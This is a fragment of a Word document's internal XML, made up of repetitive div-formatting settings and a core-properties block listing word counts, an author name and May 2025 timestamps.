            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1229918807">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="885096009">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="76437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885009">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1490944003">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2105301903">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="22649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132252">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1400514135">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1695886784">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="121464791">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="73617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742475">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1520464627">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="906646533">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="193593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420932">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1641687345">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="932905557">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1791509271">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="203739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395404">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="536358254">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="747194121">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="195836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21</TotalTime>
  <Pages>6</Pages>
  <Words>1507</Words>
  <Characters>8594</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>71</Lines>
  <Paragraphs>20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Stefano Gugliotta</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Stefano Gugliotta</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-26T13:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-26T14:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>